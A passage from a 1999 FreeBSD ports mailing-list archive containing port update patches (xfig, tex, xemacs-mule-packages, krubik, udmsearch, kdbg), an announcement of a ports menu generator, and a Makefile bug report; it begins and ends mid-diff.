-70,12 +70,12 @@ XCOMM Change XPMLIBS if necessary to point to the xpm library (libXpm) XCOMM Change XPMINC if necessary to point to the include file for xpm (xpm.h) -XCOMM #define USEXPM -XCOMM #define USEXPM_ICON +#define USEXPM +#define USEXPM_ICON #ifdef USEXPM XPMLIBDIR = $(USRLIBDIR) -XPMINC = -I$(INCDIR) +XPMINC = -I$(INCDIR)/X11 -I$(INCDIR) XPMLIBS = -L$(XPMLIBDIR) -lXpm #endif @@ -101,7 +101,7 @@ XCOMM inline functions. With the "INLINE" keyword, you should notice that XCOMM the display will be a bit faster in complex figures -XCOMM USEINLINE = -DUSE_INLINE +USEINLINE = -DUSE_INLINE XCOMM use (and change) the following if you want the multi-key data base file XCOMM somewhere other than the standard X11 library directory @@ -169,7 +169,7 @@ #ifdef USEJPEG #ifdef USEINSTALLEDJPEG -JPEGINCDIR = -I/usr/include/X11 +JPEGINCDIR = -I/usr/local/include JPEGLIB = -L$(JPEGLIBDIR) -ljpeg #else JPEGCONF = configure @@ -226,7 +226,8 @@ #endif #endif -DEFINES = $(STRDEFINES) -DGSBIT $(USEINLINE) $(DUSEXPM) \ +DEFINES = $(STRDEFINES) $(USEINLINE) $(DUSEXPM) \ + -DMAX_TOPRULER_WD=1600 -DMAX_SIDERULER_HT=1200 \ $(DUSEXPMICON) $(DUSEGIF) $(DUSEJPEG) $(I18N_DEFS) XFIGSRC = d_arc.c d_arcbox.c d_box.c d_ellipse.c d_picobj.c \ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 5:44:40 1999 Delivered-To: freebsd-ports@freebsd.org Received: from hotmail.com (f157.law4.hotmail.com [216.33.149.157]) by hub.freebsd.org (Postfix) with SMTP id A701314E2C for ; Mon, 29 Nov 1999 05:44:38 -0800 (PST) (envelope-from atillc@hotmail.com) Received: (qmail 58242 invoked by uid 0); 29 Nov 1999 13:44:37 -0000 Message-ID: <19991129134437.58241.qmail@hotmail.com> Received: from 194.69.15.144 by www.hotmail.com with HTTP; Mon, 29 Nov 1999 05:44:37 PST X-Originating-IP: [194.69.15.144] From: "Majid Faraj-" To: ports@freebsd.org Subject: PMG2 (Ports Menu Generator) Date: Mon, 29 Nov 1999 14:44:37 CET Mime-Version: 1.0 Content-Type: text/plain; format=flowed Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org (Excuse my bad english) I have written a little program that will generate menus for diffrent(right now as alpha only for Window Maker) window managers. But there was a problem in catagorizing the applications. Like if they belong to the group of graphic program or networking or something else. And that some binaries found in libaries should not be added to menus either. There is several ways to implement that but I thought it was easiest to implement a new "tag" like @name, I call it @pmg_ (becouse program is named pmg(Ports Menu Generator)). I can be changed if necassary. The @pmg_ tag would solve the problem both for catagory and which binaries to add to a menu. Syntax: @pmg_CATAGORY binary:menu description:type type: is needed becouse you'll never know if it is a window manager or an normal X client/program or something else. Code can be found at: ftp://thanius.cx/pub/FreeBSD pmg1.tgz is the first and now working release of pmg (but it isnt so useful) pmg2.tgz is the new one, it will do same thing as pmg1 and it supports the new tag @pmg_. WARNING: do not run those applications as root. Becouse I havent checked the code throughtly yet and It may do some bad things. Just run the /bin/sh scripts I included. MVH Majid Faraj-Allah, a.k.a defopert (deffo) & majidf on EFNet #freebsd. ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 5:44:52 1999 Delivered-To: freebsd-ports@freebsd.org Received: from hotmail.com (f62.law4.hotmail.com [216.33.149.62]) by hub.freebsd.org (Postfix) with SMTP id 6A927151B7 for ; Mon, 29 Nov 1999 05:44:49 -0800 (PST) (envelope-from atillc@hotmail.com) Received: (qmail 44944 invoked by uid 0); 29 Nov 1999 13:44:47 -0000 Message-ID: <19991129134447.44943.qmail@hotmail.com> Received: from 194.69.15.144 by www.hotmail.com with HTTP; Mon, 29 Nov 1999 05:44:47 PST X-Originating-IP: [194.69.15.144] From: "Majid Faraj-" To: ports@freebsd.org Subject: PMG2 (Ports Menu Generator) Date: Mon, 29 Nov 1999 14:44:47 CET Mime-Version: 1.0 Content-Type: text/plain; format=flowed Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org (Excuse my bad english) I have written a little program that will generate menus for diffrent(right now as alpha only for Window Maker) window managers. But there was a problem in catagorizing the applications. Like if they belong to the group of graphic program or networking or something else. And that some binaries found in libaries should not be added to menus either. There is several ways to implement that but I thought it was easiest to implement a new "tag" like @name, I call it @pmg_ (becouse program is named pmg(Ports Menu Generator)). I can be changed if necassary. The @pmg_ tag would solve the problem both for catagory and which binaries to add to a menu. Syntax: @pmg_CATAGORY binary:menu description:type type: is needed becouse you'll never know if it is a window manager or an normal X client/program or something else. Code can be found at: ftp://thanius.cx/pub/FreeBSD pmg1.tgz is the first and now working release of pmg (but it isnt so useful) pmg2.tgz is the new one, it will do same thing as pmg1 and it supports the new tag @pmg_. WARNING: do not run those applications as root. Becouse I havent checked the code throughtly yet and It may do some bad things. Just run the /bin/sh scripts I included. MVH Majid Faraj-Allah, a.k.a defopert (deffo) & majidf on EFNet #freebsd. ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 5:50: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 82AE5150D1 for ; Mon, 29 Nov 1999 05:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA53880; Mon, 29 Nov 1999 05:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 29 Nov 1999 05:50:02 -0800 (PST) Message-Id: <199911291350.FAA53880@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Subject: Re: ports/15142: Added DIST_SUBDIR to print/tex port Reply-To: Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15142; it has been noted by GNATS. From: To: freebsd-gnats-submit@freebsd.org Cc: lioux@linf.unb.br Subject: Re: ports/15142: Added DIST_SUBDIR to print/tex port Date: Mon, 29 Nov 1999 11:37:02 -0200 (EDT) The aforementioned patch is incomplete, here follows an additional patch: --- scripts/configure.ORIG Mon Nov 29 11:19:10 1999 +++ scripts/configure Mon Nov 29 11:18:41 1999 @@ -16,6 +16,6 @@ for i in ../../base/*tex; do ln -s $i; done for i in ../../mf/*mf; do ln -s $i; done for i in ../../lib/*mf; do ln -s $i; done -cp $DISTDIR/modes.mf . || exit 1; +cp $DISTDIR/$DIST_SUBDIR/modes.mf . || exit 1; exit 0; To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 6: 0: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AA9DB1518C for ; Mon, 29 Nov 1999 06:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA54832; Mon, 29 Nov 1999 06:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 29 Nov 1999 06:00:02 -0800 (PST) Message-Id: <199911291400.GAA54832@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: "Chris D. Faulhaber" Subject: Re: ports/15153: bugfix for the p5-Mysql port Reply-To: "Chris D. Faulhaber" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15153; it has been noted by GNATS. From: "Chris D. Faulhaber" To: Alec Wolman Cc: freebsd-gnats-submit@freebsd.org Subject: Re: ports/15153: bugfix for the p5-Mysql port Date: Mon, 29 Nov 1999 08:59:31 -0500 (EST) Personally I'd rather just add the following: RUN_DEPENDS= ${BUILD_DEPENDS} which tends to be a bit cleaner than rewriting the dependencies again. ----- Chris D. Faulhaber | You can ISO9001 certify the process of System/Network Administrator, | shooting yourself in the foot, so long Reality Check Information, Inc. | as the process is documented and reliably | produces the proper result. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 6: 0: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A810515188 for ; Mon, 29 Nov 1999 06:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA54827; Mon, 29 Nov 1999 06:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pis.toba-cmt.ac.jp (pis.toba-cmt.ac.jp [202.26.248.77]) by hub.freebsd.org (Postfix) with ESMTP id 9F100150D1 for ; Mon, 29 Nov 1999 05:52:01 -0800 (PST) (envelope-from kiri@pis.toba-cmt.ac.jp) Received: (from kiri@localhost) by pis.toba-cmt.ac.jp (8.9.3/8.9.3) id WAA98324; Mon, 29 Nov 1999 22:51:22 +0900 (JST) (envelope-from kiri) Message-Id: <199911291351.WAA98324@pis.toba-cmt.ac.jp> Date: Mon, 29 Nov 1999 22:51:22 +0900 (JST) From: KIRIYAMA Kazuhiko Reply-To: kiri@pis.toba-cmt.ac.jp To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15163: Update ports: xemacs-mule-packages-1.0(editors/xemacs-mule-packages) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15163 >Category: ports >Synopsis: Update ports: xemacs-mule-packages-1.0(editors/xemacs-mule-packages) >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Nov 29 06:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KIRIYAMA Kazuhiko >Release: FreeBSD 4.0-CURRENT i386 >Organization: Toba National College of Maritime Technology. Department of Electronic Mechanical Engineering >Environment: >Description: Updated the port xemacs-mule-packages-1.0(editors/xemacs-mule-packages). Current modifications are : (1) set correct MASTER_SITES of ps-print-ja-1.01-pkg.tar.gz Update files are respecively : I put the diff from ports-current in "Fix:". >How-To-Repeat: >Fix: diff -u -r -x CVS -x work -x *~ -x *.orig -N -I ^#.*\$Id.*$ -I ^# \$FreeBSD /usr/ports/current/editors/xemacs-mule-packages/Makefile ./Makefile --- /usr/ports/current/editors/xemacs-mule-packages/Makefile Sat Nov 27 12:28:33 1999 +++ ./Makefile Mon Nov 29 22:39:09 1999 @@ -23,12 +23,12 @@ mule-base-1.32-pkg.tar.gz locale-1.14-pkg.tar.gz \ apel-1.15-pkg.tar.gz mew-1.08-pkg.tar.gz \ skk-1.14-pkg.tar.gz elib-1.05-pkg.tar.gz \ - egg-its-1.20-pkg.tar.gz -# ps-print-ja-1.01-pkg.tar.gz + egg-its-1.20-pkg.tar.gz ps-print-ja-1.01-pkg.tar.gz MAINTAINER= kiri@pis.toba-cmt.ac.jp DIST_SUBDIR= xemacs +MASTER_SITE_SUBDIR=${DIST_SUBDIR} NO_BUILD= yes NO_WRKSUBDIR= yes diff -u -r -x CVS -x work -x *~ -x *.orig -N -I ^#.*\$Id.*$ -I ^# \$FreeBSD /usr/ports/current/editors/xemacs-mule-packages/files/md5 ./files/md5 --- /usr/ports/current/editors/xemacs-mule-packages/files/md5 Sat Nov 27 12:28:33 1999 +++ ./files/md5 Sun Nov 14 00:24:32 1999 @@ -5,3 +5,4 @@ MD5 (xemacs/skk-1.14-pkg.tar.gz) = b8c89832f314570cb251147ced107c49 MD5 (xemacs/elib-1.05-pkg.tar.gz) = b9f0d18ae78f70a65a341c515aae2095 MD5 (xemacs/egg-its-1.20-pkg.tar.gz) = a20d809b3a723a860840465b59d941b6 +MD5 (xemacs/ps-print-ja-1.01-pkg.tar.gz) = 6d42af1790d11c1ecde0157d9b0526ca diff -u -r -x CVS -x work -x *~ -x *.orig -N -I ^#.*\$Id.*$ -I ^# \$FreeBSD /usr/ports/current/editors/xemacs-mule-packages/pkg/PLIST ./pkg/PLIST --- /usr/ports/current/editors/xemacs-mule-packages/pkg/PLIST Sat Nov 27 12:28:33 1999 +++ ./pkg/PLIST Sun Nov 14 00:28:18 1999 @@ -368,12 +368,12 @@ lib/xemacs/mule-packages/lisp/mule-base/thai-xtis-util.elc lib/xemacs/mule-packages/lisp/mule-base/viet-util.el lib/xemacs/mule-packages/lisp/mule-base/viet-util.elc -@comment lib/xemacs/mule-packages/lisp/ps-print-ja/ChangeLog -@comment lib/xemacs/mule-packages/lisp/ps-print-ja/_pkg.el -@comment lib/xemacs/mule-packages/lisp/ps-print-ja/auto-autoloads.el -@comment lib/xemacs/mule-packages/lisp/ps-print-ja/auto-autoloads.elc -@comment lib/xemacs/mule-packages/lisp/ps-print-ja/ps-print.el -@comment lib/xemacs/mule-packages/lisp/ps-print-ja/ps-print.elc +lib/xemacs/mule-packages/lisp/ps-print-ja/ChangeLog +lib/xemacs/mule-packages/lisp/ps-print-ja/_pkg.el +lib/xemacs/mule-packages/lisp/ps-print-ja/auto-autoloads.el +lib/xemacs/mule-packages/lisp/ps-print-ja/auto-autoloads.elc +lib/xemacs/mule-packages/lisp/ps-print-ja/ps-print.el +lib/xemacs/mule-packages/lisp/ps-print-ja/ps-print.elc lib/xemacs/mule-packages/lisp/skk/ChangeLog lib/xemacs/mule-packages/lisp/skk/_pkg.el lib/xemacs/mule-packages/lisp/skk/auto-autoloads.el @@ -428,7 +428,7 @@ lib/xemacs/mule-packages/pkginfo/MANIFEST.locale lib/xemacs/mule-packages/pkginfo/MANIFEST.mew lib/xemacs/mule-packages/pkginfo/MANIFEST.mule-base -@comment lib/xemacs/mule-packages/pkginfo/MANIFEST.ps-print-ja +lib/xemacs/mule-packages/pkginfo/MANIFEST.ps-print-ja lib/xemacs/mule-packages/pkginfo/MANIFEST.skk @dirrm lib/xemacs/mule-packages/pkginfo @dirrm lib/xemacs/mule-packages/man/skk @@ -436,7 +436,7 @@ @dirrm lib/xemacs/mule-packages/man/elib @dirrm lib/xemacs/mule-packages/man @dirrm lib/xemacs/mule-packages/lisp/skk -@comment @dirrm lib/xemacs/mule-packages/lisp/ps-print-ja +@dirrm lib/xemacs/mule-packages/lisp/ps-print-ja @dirrm lib/xemacs/mule-packages/lisp/mule-base @dirrm lib/xemacs/mule-packages/lisp/mew @dirrm lib/xemacs/mule-packages/lisp/locale >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 6:20: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 47F9914C26 for ; Mon, 29 Nov 1999 06:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA56620; Mon, 29 Nov 1999 06:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 29 Nov 1999 06:20:02 -0800 (PST) Message-Id: <199911291420.GAA56620@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Subject: Re: ports/15142: Added DIST_SUBDIR to print/tex port Reply-To: Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15142; it has been noted by GNATS. From: To: freebsd-gnats-submit@freebsd.org Cc: lioux@linf.unb.br Subject: Re: ports/15142: Added DIST_SUBDIR to print/tex port Date: Mon, 29 Nov 1999 12:04:47 -0200 (EDT) I declare all previous patches null and void. :) I am packaging all patches together for completion. Sorry for the mess. diff -ru tex.ORIG/Makefile tex/Makefile --- tex.ORIG/Makefile Mon Nov 29 12:06:52 1999 +++ tex/Makefile Mon Nov 29 12:06:05 1999 @@ -21,6 +21,10 @@ USE_GMAKE= yes +DIST_SUBDIR= tex + +SCRIPTS_ENV= DIST_SUBDIR=${DIST_SUBDIR} + MAKE_FLAGS= fmts= all_mems= do-build: diff -ru tex.ORIG/files/md5 tex/files/md5 --- tex.ORIG/files/md5 Thu Jul 15 21:58:44 1999 +++ tex/files/md5 Mon Nov 29 12:07:49 1999 @@ -1,7 +1,7 @@ -MD5 (web2c-7.1.tar.gz) = 9337cb416cc367be7871c2f15bf91a5c -MD5 (web-7.1.tar.gz) = d525679921a0db7e4289b53415494dae -MD5 (tex_base.tar.gz) = f4c6ea916cc7a955844fdfaf43d429ae -MD5 (cm_tfm.tar.gz) = 53e7cc4680aeea7bc9bcbe04356eeed6 -MD5 (mf_lib.tar.gz) = 5c53105b2c3fe8416eb06f64c8b5adf1 -MD5 (cm_mf.tar.gz) = 199f9d26eff042df51f50d3020a0baee -MD5 (modes.mf) = 8985161376dc78ed599e0eb5c7265b31 +MD5 (tex/web2c-7.1.tar.gz) = 9337cb416cc367be7871c2f15bf91a5c +MD5 (tex/web-7.1.tar.gz) = d525679921a0db7e4289b53415494dae +MD5 (tex/tex_base.tar.gz) = f4c6ea916cc7a955844fdfaf43d429ae +MD5 (tex/cm_tfm.tar.gz) = 53e7cc4680aeea7bc9bcbe04356eeed6 +MD5 (tex/mf_lib.tar.gz) = 5c53105b2c3fe8416eb06f64c8b5adf1 +MD5 (tex/cm_mf.tar.gz) = 199f9d26eff042df51f50d3020a0baee +MD5 (tex/modes.mf) = 8985161376dc78ed599e0eb5c7265b31 diff -ru tex.ORIG/scripts/configure tex/scripts/configure --- tex.ORIG/scripts/configure Wed Feb 3 02:45:07 1999 +++ tex/scripts/configure Mon Nov 29 12:06:12 1999 @@ -16,6 +16,6 @@ for i in ../../base/*tex; do ln -s $i; done for i in ../../mf/*mf; do ln -s $i; done for i in ../../lib/*mf; do ln -s $i; done -cp $DISTDIR/modes.mf . || exit 1; +cp $DISTDIR/$DIST_SUBDIR/modes.mf . || exit 1; exit 0; To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 7:20: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 80F8D1518B for ; Mon, 29 Nov 1999 07:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA15787; Mon, 29 Nov 1999 07:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id E217915258 for ; Mon, 29 Nov 1999 07:18:23 -0800 (PST) (envelope-from jedgar@pawn.primelocation.net) Received: by pawn.primelocation.net (Postfix, from userid 1003) id 9D6FF9B37; Mon, 29 Nov 1999 10:18:22 -0500 (EST) Message-Id: <19991129151822.9D6FF9B37@pawn.primelocation.net> Date: Mon, 29 Nov 1999 10:18:22 -0500 (EST) From: jedgar@fxp.org Reply-To: jedgar@fxp.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15165: Update port: games/krubik Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15165 >Category: ports >Synopsis: Update port: games/krubik >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Nov 29 07:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Chris D. Faulhaber >Release: FreeBSD 3.3-STABLE i386 >Organization: BUGO - BSD Users Group of Orlando >Environment: FreeBSD 3.3-STABLE i386 >Description: Update port: games/krubik * Add gettext dependency (noticed by bento) * Add USE_QT (noticed by me) >How-To-Repeat: >Fix: Index: Makefile =================================================================== RCS file: /home/ncvs/ports/games/krubik/Makefile,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 Makefile --- Makefile 1999/11/26 19:14:48 1.1.1.1 +++ Makefile 1999/11/29 15:17:47 @@ -12,8 +12,10 @@ MAINTAINER= jedgar@fxp.org +BUILD_DEPENDS= ${LOCALBASE}/bin/msgfmt:${PORTSDIR}/devel/gettext LIB_DEPENDS= kdecore.2:${PORTSDIR}/x11/kdelibs11 GNU_CONFIGURE= yes +USE_QT= yes .include >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 7:50:38 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B7FC214C35 for ; Mon, 29 Nov 1999 07:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA18519; Mon, 29 Nov 1999 07:50:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from kronos.alcnet.com (kronos.alcnet.com [63.69.28.22]) by hub.freebsd.org (Postfix) with ESMTP id 4543E154BE for ; Mon, 29 Nov 1999 07:40:22 -0800 (PST) (envelope-from kbyanc@kronos.alcnet.com) Received: (from kbyanc@localhost) by kronos.alcnet.com (8.9.3/8.9.3/antispam) id KAA68504; Mon, 29 Nov 1999 10:40:22 -0500 (EST) Message-Id: <199911291540.KAA68504@kronos.alcnet.com> Date: Mon, 29 Nov 1999 10:40:22 -0500 (EST) From: kbyanc@posi.net Reply-To: kbyanc@posi.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15166: update udmsearch port to 2.2.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15166 >Category: ports >Synopsis: update udmsearch port to 2.2.1 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Nov 29 07:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Kelly Yancey >Release: FreeBSD 3.2-STABLE i386 >Organization: >Environment: >Description: Recursive diff to be applied in ports/www directory to update udmsearch port to 2.2.1 Another port, another poem For some committer to bemoan. I'll patch it, port it, send it in, until 'cvs commit' is my friend. >How-To-Repeat: >Fix: diff -ur udmsearch.orig/Makefile udmsearch/Makefile --- udmsearch.orig/Makefile Mon Nov 29 10:30:36 1999 +++ udmsearch/Makefile Mon Nov 29 10:31:12 1999 @@ -1,12 +1,12 @@ # New ports collection makefile for: udmsearch -# Version required: 2.1.7 -# Date created: 11/05/1999 +# Version required: 2.2.1 +# Date created: 11/29/1999 # Whom: Kelly Yancey # # $FreeBSD: ports/www/udmsearch/Makefile,v 1.2 1999/11/14 02:17:48 steve Exp $ # -DISTNAME= udmsearch-2.1.7 +DISTNAME= udmsearch-2.2.1 CATEGORIES= www databases MASTER_SITES= http://mysearch.udm.net/Download/ \ ftp://ftp.izhcom.ru/pub/unix/UdmSearch/ \ @@ -17,7 +17,7 @@ MAN1= indexer.1 MAN5= indexer.conf.5 -WRKSRC= ${WRKDIR}/udmsearch-2.1.7a +WRKSRC= ${WRKDIR}/udmsearch-2.2.1 USE_GMAKE= yes GNU_CONFIGURE= yes CONFIGURE_ARGS= --bindir=${PREFIX}/bin/udmsearch \ diff -ur udmsearch.orig/files/MESSAGE udmsearch/files/MESSAGE --- udmsearch.orig/files/MESSAGE Mon Nov 29 10:30:36 1999 +++ udmsearch/files/MESSAGE Mon Nov 29 10:35:32 1999 @@ -5,23 +5,23 @@ Create mysql database 'udmsearch'. You can also use existing MySQL database, skip this step in this case. - $ mysqladmin create udmsearch + $ mysqladmin create udmsearch Create tables. If you are installing UdmSearch for the first time: - $ mysql udmsearch < /usr/local/etc/udmsearch/create/create.txt + $ mysql udmsearch < /usr/local/etc/udmsearch/create/mysql/create.txt IMPORTANT: If you already use UdmSearch and want to upgrade from UdmSearch 2.0 or earlier while keep existing data, please do not use create.txt. Instead, to upgrade from UdmSearch 2.0, run - $ mysql udmsearch < /usr/local/etc/udmsearch/create/alter20-21.txt + $ mysql udmsearch < /usr/local/etc/udmsearch/create/mysql/alter20-21.txt or, to upgrade from UdmSearch 1.x, run - $ mysql udmsearch < /usr/local/etc/udmsearch/create/alter19-20.txt - $ mysql udmsearch < /usr/local/etc/udmsearch/create/alter20-21.txt + $ mysql udmsearch < /usr/local/etc/udmsearch/create/mysql/alter19-20.txt + $ mysql udmsearch < /usr/local/etc/udmsearch/create/mysql/alter20-21.txt For more information on how to use udmsearch, please refer to their web site at http://mysearch.udm.net/ diff -ur udmsearch.orig/files/md5 udmsearch/files/md5 --- udmsearch.orig/files/md5 Mon Nov 29 10:30:36 1999 +++ udmsearch/files/md5 Mon Nov 29 10:31:25 1999 @@ -1 +1 @@ -MD5 (udmsearch-2.1.7.tar.gz) = d984191fce05a2c9e2258e2932271609 +MD5 (udmsearch-2.2.1.tar.gz) = 8e5d9cc6140da9ebe3ecc9814333168d >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 8:49: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail-green.research.att.com (H-135-207-30-103.research.att.com [135.207.30.103]) by hub.freebsd.org (Postfix) with ESMTP id 2B2761522B for ; Mon, 29 Nov 1999 08:48:50 -0800 (PST) (envelope-from fenner@research.att.com) Received: from alliance.research.att.com (alliance.research.att.com [135.207.26.26]) by mail-green.research.att.com (Postfix) with ESMTP id 370B21E01D; Mon, 29 Nov 1999 11:48:50 -0500 (EST) Received: from windsor.research.att.com (windsor.research.att.com [135.207.26.46]) by alliance.research.att.com (8.8.7/8.8.7) with ESMTP id LAA11731; Mon, 29 Nov 1999 11:48:45 -0500 (EST) Received: from windsor.research.att.com (localhost [127.0.0.1]) by windsor.research.att.com (8.8.8+Sun/8.8.5) with ESMTP id LAA14869; Mon, 29 Nov 1999 11:48:45 -0500 (EST) Message-Id: <199911291648.LAA14869@windsor.research.att.com> To: mi@aldan.algebra.com Cc: ports@freebsd.org Subject: bug in russian/koi8r-ps Date: Mon, 29 Nov 1999 08:48:45 -0800 From: Bill Fenner Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It looks like ${AWK} isn't defined when make evaluates the != . The easy fix is to turn it into "awk" instead of "${AWK}", I don't know what the right fix is. Bill ------- Forwarded Message Date: Mon, 29 Nov 1999 06:30:39 -0800 (PST) Message-Id: <199911291430.GAA57861@freefall.freebsd.org> From: root@FreeBSD.org (Cron Daemon) To: fenner@FreeBSD.org ===> russian/koi8r-ps /^Search path:$/ { nl=1; next } nl { print $3; exit }: not found ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 9:50: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EE96915294 for ; Mon, 29 Nov 1999 09:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA29535; Mon, 29 Nov 1999 09:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id B4E3A15097 for ; Mon, 29 Nov 1999 09:39:59 -0800 (PST) (envelope-from jedgar@pawn.primelocation.net) Received: by pawn.primelocation.net (Postfix, from userid 1003) id 2223D9B37; Mon, 29 Nov 1999 12:39:59 -0500 (EST) Message-Id: <19991129173959.2223D9B37@pawn.primelocation.net> Date: Mon, 29 Nov 1999 12:39:59 -0500 (EST) From: jedgar@fxp.org Reply-To: jedgar@fxp.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15167: Update port: devel/kdbg Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15167 >Category: ports >Synopsis: Update port: devel/kdbg >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Nov 29 09:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Chris D. Faulhaber >Release: FreeBSD 3.3-STABLE i386 >Organization: BUGO - BSD Users Group of Orlando >Environment: FreeBSD 3.3-STABLE i386 >Description: Update port: devel/kdbg * Fix one of the MASTER_SITES (found by: portsurvey) >How-To-Repeat: >Fix: Index: Makefile =================================================================== RCS file: /home/ncvs/ports/devel/kdbg/Makefile,v retrieving revision 1.3 diff -u -r1.3 Makefile --- Makefile 1999/11/27 18:01:00 1.3 +++ Makefile 1999/11/29 17:36:36 @@ 